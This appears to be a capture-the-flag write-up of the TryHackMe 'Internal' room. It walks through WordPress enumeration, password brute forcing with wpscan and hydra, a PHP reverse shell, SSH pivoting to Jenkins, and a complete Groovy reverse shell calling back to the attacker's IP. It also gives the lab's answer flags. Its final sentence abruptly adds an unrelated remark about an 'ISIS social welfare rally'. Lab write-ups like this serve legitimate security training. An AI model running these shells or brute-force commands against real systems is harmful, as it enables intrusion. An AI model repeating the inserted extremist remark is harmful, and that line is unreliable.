Tryhackme - Internal

Tryhackme – Internal

In this walk through, we will be going through the Internal room from Tryhackme. This room is rated as hard on the platform, it simulates a standard pentesting environment where you have to pentest a machine for a client. It includes enumeration, exploitation, pivoting and at last privilege escalation which will be validated by getting user and root flags. On that note, let’s get started.

Internal

Machine Info:

TitleInternal
IPaddress10.10.150.195
DifficultyHard
ObjectiveHaving accepted the project, you are provided with the client assessment environment.  Secure the User and Root flags and submit them to the dashboard as proof of exploitation.

Task 1 – Pre-engagement Briefing

You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in three weeks. 

Scope of Work

The client requests that an engineer conducts an external, web app, and internal assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test).  The client has asked that you secure two flags (no location provided) as proof of exploitation:

  • User.txt
  • Root.txt

Additionally, the client has provided the following scope allowances:

  • Ensure that you modify your hosts file to reflect internal.thm
  • Any tools or techniques are permitted in this engagement
  • Locate and note all vulnerabilities found
  • Submit the flags discovered to the dashboard
  • Only the IP address assigned to your machine is in scope

Phase 1 – Enumeration

  • Checking if machine is live or not.

Pinging the machine

  • Starting with a regular nmap scan. Found two ports open – 80 and 22 (HTTP and SSH)

wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.150.195
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2023-04-20 21:43 IST

Nmap scan report for 10.10.150.195
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.46 seconds

nmap scan

  • Fired Gobuster on port 80 reveals directory – blog.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.150.195/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.150.195/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/20 21:48:17 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/blog                 (Status: 301) [Size: 313] [--> http://10.10.150.195/blog/]
/index.html           (Status: 200) [Size: 10918]                               
/javascript           (Status: 301) [Size: 319] [--> http://10.10.150.195/javascript/]
/phpmyadmin           (Status: 301) [Size: 319] [--> http://10.10.150.195/phpmyadmin/]
/server-status        (Status: 403) [Size: 278]                                       
/wordpress            (Status: 301) [Size: 318] [--> http://10.10.150.195/wordpress/] 
                                                                                      
===============================================================
2023/04/20 21:49:53 Finished
===============================================================

gobuster scan

  • Saving the IP in local /etc/hosts file. It lets us access the wordpress blog.

/etc/hosts file

hostname internal.thm

Wordpress Blog

  • It reveals it is running a wordpress blog. Now, I use wpscan to reveal potential usernames and low hanging fruits. Found out a username – admin.

wh1terose@fsociety:~$ wpscan --url http://internal.thm/blog/ -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.150.195]
[+] Started: Thu Apr 20 22:06:15 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://internal.thm/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 3.2
 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <========================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Apr 20 22:06:21 2023
[+] Requests Done: 24
[+] Cached Requests: 37
[+] Data Sent: 6.616 KB
[+] Data Received: 128.629 KB
[+] Memory used: 177.352 MB
[+] Elapsed time: 00:00:06

Wp-scan user enumeration
  • Next, use wp-scan to bruteforce wordpress password with xml-rpc. Found out the password to be – my2boys

wh1terose@fsociety:~$ wpscan --url http://internal.thm/blog/ --password-attack xmlrpc --max-threads 20 -P ~/Desktop/Wordlist/rockyou.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.150.195]
[+] Started: Thu Apr 20 22:10:25 2023

-- snipped --

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / my2boys                                                                                                                                           
Trying admin / princess7 Time: 00:02:08 <=================                                                                      > (3900 / 18900) 20.63%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: my2boys

[+] Finished: Thu Apr 20 22:12:49 2023
[+] Requests Done: 4082
[+] Cached Requests: 18
[+] Data Sent: 2.054 MB
[+] Data Received: 2.659 MB
[+] Memory used: 296.156 MB
[+] Elapsed time: 00:02:24
  • Logging into the wordpress admin dashboard by visiting – targetIp/wp-scan

Wordpress Dashboard

Phase 2 – Initial Access

  • To get our first shell, i modified the 404.php template in Theme editor to our good old PHP reverse shell.

Wordpress Theme Customizer
  • Dont find any use of these credentials.

Wordpress blog post

  • I set up a netcat listener on 1234 and trigger our PHP reverse shell with the following URL. Results in our first shell on the machine.

nc -lvnp 1234

Phase 3 – Escalating the user shell

  • We got in with a normal webserver user. We need to esacalate our privileges to user level to get the user flag. For that, i roam around the file system and in /opt directory, found wp-save.txt where found the credentials of user – aubreanna.

www-data@internal:/$ cd opt
cd opt
www-data@internal:/opt$ ls
ls
containerd  wp-save.txt
www-data@internal:/opt$ cat wp-save.txt 
cat wp-save.txt
Bill,

Aubreanna needed these credentials for something later.  Let her know you have them and where they are.

aubreanna:bubb13guM!@#123
www-data@internal:/opt$ su aubreanna
su aubreanna
Password: bubb13guM!@#123

aubreanna@internal:/opt$ 

  • Got the user flag.
changing user to aubreanna

User flag

  • We got a hint that a jenkins server is running in one of the internal machine.

hints.txt

Phase 4 – Accessing Internal Networks

  • To access the Jenkins server, we need to port forward our way to it. So that, we can access it as we are unable to access it via our local attacking machine. I use SSH tunnelling to connect a port from my local machine to the internal jenkins server routing our tunnel through the credentials of aubreanna user.

wh1terose@fsociety:~/CTF/TryHackme/Internal$ ssh -L 6767:172.17.0.2:8080 [email protected]
The authenticity of host 'internal.thm (10.10.150.195)' can't be established.
ECDSA key fingerprint is SHA256:fJ/BlTrDF8wS8/eqyoej1aq/NmvQh79ABdkpiiN5tqE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'internal.thm' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Apr 20 17:51:13 UTC 2023

  System load:  0.08              Processes:              123
  Usage of /:   63.8% of 8.79GB   Users logged in:        0
  Memory usage: 49%               IP address for eth0:    10.10.150.195
  Swap usage:   0%                IP address for docker0: 172.17.0.1

  => There is 1 zombie process.


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.


Last login: Mon Aug  3 19:56:19 2020 from 10.6.2.56
aubreanna@internal:~$ 

Pivoting to internal machines

  • Accessing the jenkins server at localhost and port 6767. Tried to login with some default creds like admin:admin, admin:password etc. But no luck.

Jenkins Login Panel

  • We have to bruteforce our way in. For that, first capture a post request in burpsuite which will reveals the username and password placeholder for the bruteforce attack.

POST /j_acegi_security_check HTTP/1.1
Host: localhost:6767
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Origin: http://localhost:6767
DNT: 1
Connection: close
Referer: http://localhost:6767/loginError
Cookie: JSESSIONID.18b6903e=node01i3fc1q755dtt1qyao1hqrrwj22.node0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0

j_username=admin&j_password=123&from=%2Fvar%2Flib%2Fjenkins%2Fsecrets%2FinitialAdminPassword&Submit=Sign+in
  • Used hydra to bruteforce the password of the username admin. Got the password – spongbob.

wh1terose@fsociety:~$ hydra -l admin -P ~/Desktop/Wordlist/rockyou.txt 127.0.0.1 -s6767 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
Hydra v9.5-dev (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-21 21:27:48
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 15000 login tries (l:1/p:15000), ~938 tries per task
[DATA] attacking http-post-form://127.0.0.1:6767/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password
[6767][http-post-form] host: 127.0.0.1   login: admin   password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-21 21:28:46

hydra bruteforcing

  • Got into the Jenkins admin dashboard. Next, we have to figure out a way to upload and execute a reverse shell.

Jenkins dashboard

Phase 5 – Getting root access

  • Next to get a shell access, go to script in manage jenkins section. Jenkins has script console which uses groovy script to execute. I use the following reverse shell and capture the response in my netcat listener.

String host="10.18.11.103";
int port=4444;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

script console jenkins

netcat listener

  • Just roam in the /opt directory and you will find the root password in the note.txt file lying around.

root credentials
  • Got the credentials – username: root and password: tr0ub13guM!@#123

  • Back to the SSH shell from user aubreanna, we rooted this machine! and got our flag.

root flag

Task 2 – Deploy and Engage the Client Environment

Question 1 – User.txt Flag

THM{int3rna1_fl4g_1}

Question 2 – Root.txt Flag

THM{d0ck3r_d3str0y3r}

Task 2 - Deploy and Engage the Client Environment

Also Read: Tryhackme – Ice

Conclusion:

Conclusion

So that was “Internal” for you. Let’s sum it up quickly. We started off with a regular nmap scan, found port 22 (SSH) and 80 (HTTP) open. The web server was running a WordPress blog. Used wp-scan on it to enumerate usernames and later bruteforced our way into the WordPress dashboard. Next, we changes the content of the 404.php file with our PHP reverse shell to get our initial access. After getting the access, we first escalated our shell to user aubreanna using the credentials found in wp-save.txt. This led to us in getting the user flag. Now, we have to pivot to another machine using the existing machine and privileges. For this, used SSH tunneling to port 8080 on localhost which was apparently running a Jenkins server. Moving on, used hydra to get the password for the Jenkins dashboard login. Once inside, used the Jenkins script console to execute a groovy script reverse shell to get our root shell and the root flag that we waived in our next ISIS social welfare rally.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top